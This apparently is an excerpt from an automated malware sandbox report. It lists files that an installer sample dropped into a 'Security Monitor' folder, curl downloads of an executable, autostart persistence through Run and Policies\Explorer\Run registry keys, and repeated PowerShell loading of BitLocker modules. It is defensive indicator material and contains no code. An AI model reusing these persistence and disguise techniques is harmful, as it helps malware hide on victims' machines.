Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-9U2JI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ssleay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-JVHDE.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\curl.exe	File created: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sqlite3.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\webbrowser.dll	Jump to dropped file
Source: C:\Windows\System32\curl.exe	File created: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-24VMR.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-67IFD.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-JLPKJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lame_enc.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File created: C:\ProgramData\Security Monitor\{WCS1080F-FD66-4650-B1B8-C8310A1CE2D3}\ffws.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe	File created: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ff.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-HNNTE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-719F1.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-1I5NJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-H780M.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\libeay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-EO3DV.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-NNSLF.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-GD8FS.tmp	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-9U2JI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ssleay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-JVHDE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sqlite3.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-24VMR.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-67IFD.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-JLPKJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lame_enc.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe (copy)	Jump to dropped file
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File created: C:\ProgramData\Security Monitor\{WCS1080F-FD66-4650-B1B8-C8310A1CE2D3}\ffws.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ff.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-HNNTE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-719F1.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-1I5NJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-H780M.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\libeay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-EO3DV.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-NNSLF.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-GD8FS.tmp	Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localSPM
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localSPM
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localSPM
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localSPM
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localmon
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localmon
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localmon
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localmon

Stores files to the Windows start menu directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run kbdsprt
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run kbdsprt
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run localSPM
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run localSPM

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
